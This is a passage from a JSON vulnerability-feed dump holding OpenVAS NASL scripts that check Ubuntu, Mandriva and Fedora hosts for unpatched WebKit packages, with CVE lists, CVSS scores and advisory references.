VE-2010-1770\",\"CVE-2010-1771\",\"CVE-2010-1772\",\"CVE-2010-1773\",\"CVE-2010-1774\",\"CVE-2010-1780\",\"CVE-2010-1781\",\"CVE-2010-1782\",\"CVE-2010-1783\",\"CVE-2010-1784\",\"CVE-2010-1785\",\"CVE-2010-1786\",\"CVE-2010-1787\",\"CVE-2010-1788\",\"CVE-2010-1790\",\"CVE-2010-1792\",\"CVE-2010-1793\",\"CVE-2010-1807\",\"CVE-2010-1812\",\"CVE-2010-1814\",\"CVE-2010-1815\",\"CVE-2010-2264\",\"CVE-2010-2647\",\"CVE-2010-2648\",\"CVE-2010-3113\",\"CVE-2010-3114\",\"CVE-2010-3115\",\"CVE-2010-3116\",\"CVE-2010-3248\",\"CVE-2010-3257\",\"CVE-2010-3259\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 7965 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 08:38:25 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-10-22 16:42:09 +0200 (Fri, 22 Oct 2010)\");\n script_xref(name: \"USN\", value: \"1006-1\");\n script_name(\"Ubuntu Update for webkit vulnerabilities USN-1006-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libwebkit-1.0-2-dbg\", ver:\"1.2.5-0ubuntu0.9.10.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit-1.0-2\", ver:\"1.2.5-0ubuntu0.9.10.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit-dev\", ver:\"1.2.5-0ubuntu0.9.10.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit-1.0-common\", ver:\"1.2.5-0ubuntu0.9.10.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libwebkit-1.0-2-dbg\", ver:\"1.2.5-0ubuntu0.10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit-1.0-2\", ver:\"1.2.5-0ubuntu0.10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit-dev\", ver:\"1.2.5-0ubuntu0.10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"gir1.0-webkit-1.0\", ver:\"1.2.5-0ubuntu0.10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit-1.0-common\", ver:\"1.2.5-0ubuntu0.10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0049", "CVE-2010-0052", "CVE-2010-1412", "CVE-2010-4197", "CVE-2010-1397", "CVE-2010-4204", "CVE-2010-1416", "CVE-2010-1396", "CVE-2010-1417", "CVE-2010-3257", "CVE-2010-1409", "CVE-2010-0046", "CVE-2010-0651", "CVE-2010-1760", "CVE-2010-0054", "CVE-2010-1783", "CVE-2009-2841", "CVE-2010-3812", "CVE-2010-1758", "CVE-2010-1787", "CVE-2010-1771", "CVE-2009-2797", "CVE-2010-1410", "CVE-2010-1807", "CVE-2010-3116", "CVE-2010-0048", "CVE-2010-3113", "CVE-2010-1415", "CVE-2010-1419", "CVE-2010-1407", "CVE-2010-1780", "CVE-2010-1766", "CVE-2010-1772", "CVE-2010-1389", "CVE-2010-1391", "CVE-2010-1664", "CVE-2010-1387", "CVE-2010-1759", "CVE-2010-2647", "CVE-2010-0650", "CVE-2010-1786", "CVE-2010-1773", "CVE-2010-1785", "CVE-2010-2648", "CVE-2010-3114", "CVE-2010-3119", "CVE-2010-1774", "CVE-2010-1395", "CVE-2010-1400", "CVE-2010-2264", "CVE-2010-0314", "CVE-2010-1406", "CVE-2010-1418", "CVE-2010-1398", "CVE-2010-3255", "CVE-2010-1790", "CVE-2010-1401", "CVE-2010-1788", "CVE-2010-1781", "CVE-2010-1815", "CVE-2010-1408", "CVE-2010-1403", "CVE-2010-1404", "CVE-2010-1761", "CVE-2010-1782", "CVE-2010-1814", "CVE-2010-1665", "CVE-2010-3115", "CVE-2010-1792", "CVE-2010-1422", "CVE-2010-1390", "CVE-2010-1767", "CVE-2010-3259", "CVE-2010-4206", "CVE-2010-0656", "CVE-2010-1812", "CVE-2010-1393", "CVE-2010-1791", "CVE-2010-1770", "CVE-2010-1392", "CVE-2010-0647", "CVE-2010-4198", "CVE-2010-1784", "CVE-2010-0053", "CVE-2010-0047", "CVE-2010-0051", "CVE-2010-1402", "CVE-2010-3248", "CVE-2010-4040", "CVE-2010-1762", "CVE-2010-0050", "CVE-2010-1386", "CVE-2010-3813", "CVE-2010-1764", "CVE-2010-1405", "CVE-2010-1414", "CVE-2010-1421", "CVE-2010-1394", "CVE-2010-1793"], "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2011-03-07T00:00:00", "id": "OPENVAS:1361412562310831343", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831343", "type": "openvas", "title": "Mandriva Update for webkit MDVSA-2011:039 (webkit)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for webkit MDVSA-2011:039 (webkit)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.mandriva.com/security-announce/2011-03/msg00000.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831343\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-03-07 06:45:55 +0100 (Mon, 07 Mar 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"MDVSA\", value:\"2011:039\");\n script_cve_id(\"CVE-2010-1665\", \"CVE-2010-1664\", \"CVE-2010-3248\", \"CVE-2010-1784\", \"CVE-2010-1785\", \"CVE-2010-1786\", \"CVE-2010-1787\", \"CVE-2010-1780\", \"CVE-2010-1781\", \"CVE-2010-1782\", \"CVE-2010-1783\", \"CVE-2010-1788\", \"CVE-2010-1386\", \"CVE-2010-1387\", \"CVE-2010-1389\", \"CVE-2010-3259\", \"CVE-2010-1771\", \"CVE-2010-1770\", \"CVE-2010-1773\", \"CVE-2010-1772\", \"CVE-2010-1774\", \"CVE-2010-2264\", \"CVE-2010-0054\", \"CVE-2010-0053\", \"CVE-2010-0052\", \"CVE-2010-0051\", \"CVE-2010-0050\", \"CVE-2010-1762\", \"CVE-2010-1760\", \"CVE-2010-1761\", \"CVE-2010-1766\", \"CVE-2010-1767\", \"CVE-2010-1764\", \"CVE-2010-0048\", \"CVE-2010-0049\", \"CVE-2010-2647\", \"CVE-2010-2648\", \"CVE-2010-0046\", \"CVE-2010-0047\", \"CVE-2010-1759\", \"CVE-2010-1758\", \"CVE-2009-2841\", \"CVE-2010-4040\", \"CVE-2010-1421\", \"CVE-2010-1422\", \"CVE-2010-0656\", \"CVE-2010-0651\", \"CVE-2010-0650\", \"CVE-2010-4198\", \"CVE-2010-4197\", \"CVE-2010-3812\", \"CVE-2010-3813\", \"CVE-2010-3113\", \"CVE-2010-3116\", \"CVE-2010-3115\", \"CVE-2010-3114\", \"CVE-2010-0647\", \"CVE-2010-3119\", \"CVE-2010-0314\", \"CVE-2010-4206\", \"CVE-2010-4204\", \"CVE-2009-2797\", \"CVE-2010-1407\", \"CVE-2010-1406\", \"CVE-2010-1405\", \"CVE-2010-1404\", \"CVE-2010-1403\", \"CVE-2010-1402\", \"CVE-2010-1401\", \"CVE-2010-1400\", \"CVE-2010-1409\", \"CVE-2010-1408\", \"CVE-2010-1807\", \"CVE-2010-3255\", \"CVE-2010-1410\", \"CVE-2010-1412\", \"CVE-2010-3257\", \"CVE-2010-1414\", \"CVE-2010-1415\", \"CVE-2010-1416\", \"CVE-2010-1417\", \"CVE-2010-1418\", \"CVE-2010-1419\", \"CVE-2010-1814\", \"CVE-2010-1815\", \"CVE-2010-1812\", \"CVE-2010-1793\", \"CVE-2010-1792\", \"CVE-2010-1791\", \"CVE-2010-1790\", \"CVE-2010-1397\", \"CVE-2010-1396\", \"CVE-2010-1395\", \"CVE-2010-1394\", \"CVE-2010-1393\", \"CVE-2010-1392\", \"CVE-2010-1391\", \"CVE-2010-1390\", \"CVE-2010-1398\");\n script_name(\"Mandriva Update for webkit MDVSA-2011:039 (webkit)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkit'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\", re:\"ssh/login/release=MNDK_2010\\.1\");\n script_tag(name:\"affected\", value:\"webkit on Mandriva Linux 2010.1,\n Mandriva Linux 2010.1/X86_64\");\n script_tag(name:\"insight\", value:\"Multiple cross-site scripting, denial of service and arbitrary code\n execution security flaws were discovered in webkit.\n\n Please consult the CVE web links for further information.\n\n The updated packages have been upgraded to the latest version (1.2.7)\n to correct these issues.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libwebkitgtk1.0_2\", rpm:\"libwebkitgtk1.0_2~1.2.7~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwebkitgtk1.0-devel\", rpm:\"libwebkitgtk1.0-devel~1.2.7~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"webkit1.0\", rpm:\"webkit1.0~1.2.7~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"webkit1.0-webinspector\", rpm:\"webkit1.0-webinspector~1.2.7~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"webkit\", rpm:\"webkit~1.2.7~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"webkit-gtklauncher\", rpm:\"webkit-gtklauncher~1.2.7~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"webkit-jsc\", rpm:\"webkit-jsc~1.2.7~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64webkitgtk1.0_2\", rpm:\"lib64webkitgtk1.0_2~1.2.7~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64webkitgtk1.0-devel\", rpm:\"lib64webkitgtk1.0-devel~1.2.7~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:55:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0049", "CVE-2010-0052", "CVE-2010-1412", "CVE-2010-4197", "CVE-2010-1397", "CVE-2010-4204", "CVE-2010-1416", "CVE-2010-1396", "CVE-2010-1417", "CVE-2010-3257", "CVE-2010-1409", "CVE-2010-0046", "CVE-2010-0651", "CVE-2010-1760", "CVE-2010-0054", "CVE-2010-1783", "CVE-2009-2841", "CVE-2010-3812", "CVE-2010-1758", "CVE-2010-1787", "CVE-2010-1771", "CVE-2009-2797", "CVE-2010-1410", "CVE-2010-1807", "CVE-2010-3116", "CVE-2010-0048", "CVE-2010-3113", "CVE-2010-1415", "CVE-2010-1419", "CVE-2010-1407", "CVE-2010-1780", "CVE-2010-1766", "CVE-2010-1772", "CVE-2010-1389", "CVE-2010-1391", "CVE-2010-1664", "CVE-2010-1387", "CVE-2010-1759", "CVE-2010-2647", "CVE-2010-0650", "CVE-2010-1786", "CVE-2010-1773", "CVE-2010-1785", "CVE-2010-2648", "CVE-2010-3114", "CVE-2010-3119", "CVE-2010-1774", "CVE-2010-1395", "CVE-2010-1400", "CVE-2010-2264", "CVE-2010-0314", "CVE-2010-1406", "CVE-2010-1418", "CVE-2010-1398", "CVE-2010-3255", "CVE-2010-1790", "CVE-2010-1401", "CVE-2010-1788", "CVE-2010-1781", "CVE-2010-1815", "CVE-2010-1408", "CVE-2010-1403", "CVE-2010-1404", "CVE-2010-1761", "CVE-2010-1782", "CVE-2010-1814", "CVE-2010-1665", "CVE-2010-3115", "CVE-2010-1792", "CVE-2010-1422", "CVE-2010-1390", "CVE-2010-1767", "CVE-2010-3259", "CVE-2010-4206", "CVE-2010-0656", "CVE-2010-1812", "CVE-2010-1393", "CVE-2010-1791", "CVE-2010-1770", "CVE-2010-1392", "CVE-2010-0647", "CVE-2010-4198", "CVE-2010-1784", "CVE-2010-0053", "CVE-2010-0047", "CVE-2010-0051", "CVE-2010-1402", "CVE-2010-3248", "CVE-2010-4040", "CVE-2010-1762", "CVE-2010-0050", "CVE-2010-1386", "CVE-2010-3813", "CVE-2010-1764", "CVE-2010-1405", "CVE-2010-1414", "CVE-2010-1421", "CVE-2010-1394", "CVE-2010-1793"], "description": "Check for the Version of webkit", "modified": "2017-07-06T00:00:00", "published": "2011-03-07T00:00:00", "id": "OPENVAS:831343", "href": "http://plugins.openvas.org/nasl.php?oid=831343", "type": "openvas", "title": "Mandriva Update for webkit MDVSA-2011:039 (webkit)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for webkit MDVSA-2011:039 (webkit)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple cross-site scripting, denial of service and arbitrary code\n execution security flaws were discovered in webkit.\n\n Please consult the CVE web links for further information.\n \n The updated packages have been upgraded to the latest version (1.2.7)\n to correct these issues.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"webkit on Mandriva Linux 2010.1,\n Mandriva Linux 2010.1/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2011-03/msg00000.php\");\n script_id(831343);\n script_version(\"$Revision: 6570 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:06:35 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-03-07 06:45:55 +0100 (Mon, 07 Mar 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"MDVSA\", value: \"2011:039\");\n script_cve_id(\"CVE-2010-1665\", \"CVE-2010-1664\", \"CVE-2010-3248\", \"CVE-2010-1784\", \"CVE-2010-1785\", \"CVE-2010-1786\", \"CVE-2010-1787\", \"CVE-2010-1780\", \"CVE-2010-1781\", \"CVE-2010-1782\", \"CVE-2010-1783\", \"CVE-2010-1788\", \"CVE-2010-1386\", \"CVE-2010-1387\", \"CVE-2010-1389\", \"CVE-2010-3259\", \"CVE-2010-1771\", \"CVE-2010-1770\", \"CVE-2010-1773\", \"CVE-2010-1772\", \"CVE-2010-1774\", \"CVE-2010-2264\", \"CVE-2010-0054\", \"CVE-2010-0053\", \"CVE-2010-0052\", \"CVE-2010-0051\", \"CVE-2010-0050\", \"CVE-2010-1762\", \"CVE-2010-1760\", \"CVE-2010-1761\", \"CVE-2010-1766\", \"CVE-2010-1767\", \"CVE-2010-1764\", \"CVE-2010-0048\", \"CVE-2010-0049\", \"CVE-2010-2647\", \"CVE-2010-2648\", \"CVE-2010-0046\", \"CVE-2010-0047\", \"CVE-2010-1759\", \"CVE-2010-1758\", \"CVE-2009-2841\", \"CVE-2010-4040\", \"CVE-2010-1421\", \"CVE-2010-1422\", \"CVE-2010-0656\", \"CVE-2010-0651\", \"CVE-2010-0650\", \"CVE-2010-4198\", \"CVE-2010-4197\", \"CVE-2010-3812\", \"CVE-2010-3813\", \"CVE-2010-3113\", \"CVE-2010-3116\", \"CVE-2010-3115\", \"CVE-2010-3114\", \"CVE-2010-0647\", \"CVE-2010-3119\", \"CVE-2010-0314\", \"CVE-2010-4206\", \"CVE-2010-4204\", \"CVE-2009-2797\", \"CVE-2010-1407\", \"CVE-2010-1406\", \"CVE-2010-1405\", \"CVE-2010-1404\", \"CVE-2010-1403\", \"CVE-2010-1402\", \"CVE-2010-1401\", \"CVE-2010-1400\", \"CVE-2010-1409\", \"CVE-2010-1408\", \"CVE-2010-1807\", \"CVE-2010-3255\", \"CVE-2010-1410\", \"CVE-2010-1412\", \"CVE-2010-3257\", \"CVE-2010-1414\", \"CVE-2010-1415\", \"CVE-2010-1416\", \"CVE-2010-1417\", \"CVE-2010-1418\", \"CVE-2010-1419\", \"CVE-2010-1814\", \"CVE-2010-1815\", \"CVE-2010-1812\", \"CVE-2010-1793\", \"CVE-2010-1792\", \"CVE-2010-1791\", \"CVE-2010-1790\", \"CVE-2010-1397\", \"CVE-2010-1396\", \"CVE-2010-1395\", \"CVE-2010-1394\", \"CVE-2010-1393\", \"CVE-2010-1392\", \"CVE-2010-1391\", \"CVE-2010-1390\", \"CVE-2010-1398\");\n script_name(\"Mandriva Update for webkit MDVSA-2011:039 (webkit)\");\n\n script_summary(\"Check for the Version of webkit\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libwebkitgtk1.0_2\", rpm:\"libwebkitgtk1.0_2~1.2.7~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwebkitgtk1.0-devel\", rpm:\"libwebkitgtk1.0-devel~1.2.7~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"webkit1.0\", rpm:\"webkit1.0~1.2.7~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"webkit1.0-webinspector\", rpm:\"webkit1.0-webinspector~1.2.7~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"webkit\", rpm:\"webkit~1.2.7~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"webkit-gtklauncher\", rpm:\"webkit-gtklauncher~1.2.7~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"webkit-jsc\", rpm:\"webkit-jsc~1.2.7~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64webkitgtk1.0_2\", rpm:\"lib64webkitgtk1.0_2~1.2.7~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64webkitgtk1.0-devel\", rpm:\"lib64webkitgtk1.0-devel~1.2.7~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-26T11:05:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1416", "CVE-2010-1417", "CVE-2010-1760", "CVE-2010-1783", "CVE-2010-1758", "CVE-2010-1787", "CVE-2010-1771", "CVE-2010-1407", "CVE-2010-1780", "CVE-2010-1772", "CVE-2010-1664", "CVE-2010-1759", "CVE-2010-1786", "CVE-2010-1773", "CVE-2010-1785", "CVE-2010-2648", "CVE-2010-1774", "CVE-2010-2264", "CVE-2010-1418", "CVE-2010-1790", "CVE-2010-1788", "CVE-2010-1761", "CVE-2010-1782", "CVE-2010-1665", "CVE-2010-1792", "CVE-2010-1422", "CVE-2010-1767", "CVE-2010-1770", "CVE-2010-1392", "CVE-2010-1784", "CVE-2010-1762", "CVE-2010-1386", "CVE-2010-1405", "CVE-2010-1421", "CVE-2010-1793"], "description": "Check for the Version of webkitgtk", "modified": "2018-01-25T00:00:00", "published": "2010-09-22T00:00:00", "id": "OPENVAS:1361412562310862409", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310862409", "type": "openvas", "title": "Fedora Update for webkitgtk FEDORA-2010-14409", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for webkitgtk FEDORA-2010-14409\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"webkitgtk on Fedora 13\";\ntag_insight = \"WebKitGTK+ is the port of the portable web rendering engine WebKit to the\n GTK+ platform.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-September/047699.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.862409\");\n script_version(\"$Revision: 8528 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-25 08:57:36 +0100 (Thu, 25 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-09-22 08:32:53 +0200 (Wed, 22 Sep 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-14409\");\n script_cve_id(\"CVE-2010-1407\", \"CVE-2010-1405\", \"CVE-2010-1664\", \"CVE-2010-1421\", \"CVE-2010-1760\", \"CVE-2010-1422\", \"CVE-2010-1767\", \"CVE-2010-1771\", \"CVE-2010-2648\", \"CVE-2010-1784\", \"CVE-2010-1785\", \"CVE-2010-1786\", \"CVE-2010-1787\", \"CVE-2010-1780\", \"CVE-2010-1782\", \"CVE-2010-1783\", \"CVE-2010-1788\", \"CVE-2010-1762\", \"CVE-2010-1386\", \"CVE-2010-1761\", \"CVE-2010-1416\", \"CVE-2010-1417\", \"CVE-2010-1418\", \"CVE-2010-1770\", \"CVE-2010-1773\", \"CVE-2010-1772\", \"CVE-2010-1774\", \"CVE-2010-1759\", \"CVE-2010-1758\", \"CVE-2010-1665\", \"CVE-2010-2264\", \"CVE-2010-1793\", \"CVE-2010-1792\", \"CVE-2010-1790\", \"CVE-2010-1392\");\n script_name(\"Fedora Update for webkitgtk FEDORA-2010-14409\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of webkitgtk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC13\")\n{\n\n if ((res = isrpmvuln(pkg:\"webkitgtk\", rpm:\"webkitgtk~1.2.4~1.fc13\", rls:\"FC13\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-25T10:55:18", "bulletinFamily": "scanner", "cvelist": 